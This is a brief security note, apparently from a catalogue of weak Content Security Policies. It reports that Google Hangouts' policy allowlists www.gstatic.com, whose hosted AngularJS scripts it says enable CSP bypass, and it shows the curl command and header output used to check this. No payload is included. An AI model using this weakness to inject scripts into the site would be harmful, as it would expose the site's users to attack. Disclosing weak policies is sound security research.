Useless CSP

Aug 28, 2018

Google Hangout

Google Hangout (The link might not work, you'll have to check the headers sent for a valid call.) allows https://www.gstatic.com (which hosts AngularJS scripts, allowing comprehensive CSP bypasses).

$ curl -s -i 'https://hangouts.google.com/call/' -b 'yourcookie=yourvalue | grep -Ei '^Content-Security-Policy:' | sed "s/;/;\\n/g"           
script-src 'nonce-49VcM8sdA5vMEYgv3vjKXF5t9Rk' 'self' 'unsafe-eval' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com;
report-uri /_/elUi/cspreport;
$